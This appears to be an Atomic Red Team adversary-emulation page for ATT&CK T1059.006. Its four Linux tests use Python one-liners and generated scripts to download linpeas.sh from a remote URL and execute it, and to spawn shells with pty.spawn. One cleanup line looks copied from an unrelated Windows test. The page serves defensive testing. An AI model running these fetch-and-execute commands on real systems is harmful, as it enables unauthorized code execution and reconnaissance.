T1059.006 - Command and Scripting Interpreter: Python
Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the python.exe interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.(Citation: Zscaler APT31 Covid-19 October 2020)
Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.
Atomic Tests
Atomic Test #1 - Execute shell script via python’s command mode arguement
Download and execute shell script and write to file then execute locally using Python -c (command mode)
Supported Platforms: Linux
auto_generated_guid: 3a95cdb2-c6ea-4761-b24e-02b71889b8bb
| Name | Description | Type | Default Value |
|——|————-|——|—————|
| script_url | Shell script public URL | string | https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh|
| payload_file_name | Name of shell script downloaded from the script_url | string | T1059.006-payload|
| executor | FreeBSD or Linux shell | string | sh|
| script_args | Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files. | string | -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles|
Attack Commands: Run with
1
2
| which_python=$(which python || which python3 || which python3.9 || which python2)
$which_python -c 'import requests;import os;url = "#{script_url}";malicious_command = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)'
|
Cleanup Commands:
1
2
| rm #{payload_file_name}
pip-autoremove pypykatz >nul 2> nul
|
Dependencies: Run with
Description: Verify if python is in the environment variable path and attempt to import requests library.
Check Prereq Commands:
1
2
| which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
|
Get Prereq Commands:
Atomic Test #2 - Execute Python via scripts
Create Python file (.py) that downloads and executes shell script via executor arguments
Supported Platforms: Linux
auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
| Name | Description | Type | Default Value |
|——|————-|——|—————|
| python_script_name | Python script name | path | T1059.006.py|
| script_url | Shell script public URL | string | https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh|
| payload_file_name | Shell script file name downloaded from the script_url | string | T1059.006-payload|
| executor | Payload or script interpreter / executor | string | sh|
| script_args | Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files | string | -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles|
Attack Commands: Run with
1
2
3
4
5
6
7
8
9
10
11
12
| which_python=$(which python || which python3 || which python3.9 || which python2)
echo 'import requests' > #{python_script_name}
echo 'import os' >> #{python_script_name}
echo 'url = "#{script_url}"' >> #{python_script_name}
echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name}
echo 'session = requests.session()' >> #{python_script_name}
echo 'source = session.get(url).content' >> #{python_script_name}
echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name}
echo 'fd.write(source)' >> #{python_script_name}
echo 'fd.close()' >> #{python_script_name}
echo 'os.system(malicious_command)' >> #{python_script_name}
$which_python #{python_script_name}
|
Cleanup Commands:
1
| rm #{python_script_name} #{payload_file_name}
|
Dependencies: Run with
Description: Requires Python
Check Prereq Commands:
1
2
| which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
|
Get Prereq Commands:
Atomic Test #3 - Execute Python via Python executables
Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments
Supported Platforms: Linux
auto_generated_guid: 0b44d79b-570a-4b27-a31f-3bf2156e5eaa
| Name | Description | Type | Default Value |
|——|————-|——|—————|
| python_script_name | Name of Python script name | path | T1059.006.py|
| script_url | URL hosting external malicious payload | string | https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh|
| payload_file_name | Shell script file name downloaded from the script_url | string | T1059.006-payload|
| executor | Payload or script interpreter / executor | string | sh|
| script_args | Arguments to check for system stats, available software, process details, environment paths, open sockets, and interesting files | string | -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles|
| python_binary_name | Name of Python file to be compiled | path | T1059.006.pyc|
Attack Commands: Run with
1
2
3
4
5
6
7
8
9
10
11
12
13
| which_python=$(which python || which python3 || which python3.9 || which python2)
echo 'import requests' > #{python_script_name}
echo 'import os' >> #{python_script_name}
echo 'url = "#{script_url}"' >> #{python_script_name}
echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name}
echo 'session = requests.session()' >> #{python_script_name}
echo 'source = session.get(url).content' >> #{python_script_name}
echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name}
echo 'fd.write(source)' >> #{python_script_name}
echo 'fd.close()' >> #{python_script_name}
echo 'os.system(malicious_command)' >> #{python_script_name}
$which_python -c 'import py_compile; py_compile.compile("#{python_script_name}", "#{python_binary_name}")'
$which_python #{python_binary_name}
|
Cleanup Commands:
1
| rm #{python_binary_name} #{python_script_name} #{payload_file_name}
|
Dependencies: Run with
Description: Requires Python
Check Prereq Commands:
1
2
| which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
|
Get Prereq Commands:
Atomic Test #4 - Python pty module and spawn function used to spawn sh or bash
Uses the Python spawn function to spawn a sh shell followed by a bash shell. Per Volexity, this technique was observed in exploitation of Atlassian Confluence [CVE-2022-26134]. Reference: https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence
Supported Platforms: Linux
auto_generated_guid: 161d694c-b543-4434-85c3-c3a433e33792
Attack Commands: Run with
1
2
3
4
5
| which_python=$(which python || which python3 || which python3.9 || which python2)
$which_python -c "import pty;pty.spawn('/bin/sh')"
exit
$which_python -c "import pty;pty.spawn('/bin/bash')"
exit
|
Dependencies: Run with
Description: Verify if python is in the environment variable path and attempt to import requests library.
Check Prereq Commands:
1
2
| which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
|
Get Prereq Commands: